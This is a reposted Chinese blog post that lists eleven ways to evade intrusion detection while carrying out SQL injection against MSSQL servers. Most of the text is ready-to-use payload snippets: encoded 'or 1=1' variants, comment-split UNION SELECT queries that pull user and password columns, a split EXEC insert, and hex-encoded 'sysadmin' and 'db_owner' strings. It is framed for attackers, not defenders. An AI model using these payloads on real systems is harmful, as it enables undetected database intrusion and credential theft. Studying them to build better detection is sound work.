天天看點

SQL Injection規避入侵檢測技術總結

當我們對一個運作IDS系統的伺服器進行SQL注射時,我們往往會遇到很大的麻煩,因為我們的注射語句被過濾了,如何規避這種檢測手段就成了一門新的技術,本文就對此規避技術提出十一條思路和方法,與大家商戳。

一、 運用編碼技術繞過,如URLEncode編碼,ASCII編碼繞過。

如or 1=1即%6f%72%20%31%3d%31

Test即CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

二、 通過空格繞過,如兩個空格代替一個空格,用Tab代替空格等,或者删除所有空格,如or’swords’=‘swords’,由于mssql的松散性,我們可以把or ‘swords’之間的空格去掉,并不影響運作。

三、 運用字元串判斷代替經典的or 1=1判斷繞過,如or ‘swords’=‘swords’

四、 通過類型轉換修飾符N繞過,如or ‘swords’ = N’swords’,大寫的N告訴mssql server 字元串作為nvarchar類型,它起到類型轉換的作用,并不影響注射語句本身,但是可以避過基于知識的模式比對IDS。

五、 通過+号拆解字元串繞過,

如 or ‘swords’=‘sw’+’ords’

;EXEC(‘IN’+’SERT INTO ‘+’…..’)

六、 通過LIKE繞過,如or ‘swords’ LIKE ‘sw’

七、 通過IN繞過,如or ‘swords’ IN (‘swords’)

八、 通過BETWEEN繞過, 如or ‘swords’ BETWEEN ‘rw’ AND ‘tw’

九、 通過>或者<繞過,如

or ‘swords’>‘sw’

or ‘swords’<‘tw’

or 1<3

十、 運用注釋語句繞過:

用/**/代替空格,如:

UNION /**/ SELECT /**/user,pwd,from tbluser

用/**/分割敏感詞,如:

U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser

十一、 用HEX繞過,一般的IDS都無法檢測出來。

0x730079007300610064006D0069006E00 =hex(sysadmin)

0x640062005F006F0077006E0065007200 =hex(db_owner)

以上的十一條SQL Injection規避入侵檢測技術供您參考。

本文轉sinojelly51CTO部落格,原文連結:http://blog.51cto.com/pnig0s1992/338198,如需轉載請自行聯系原作者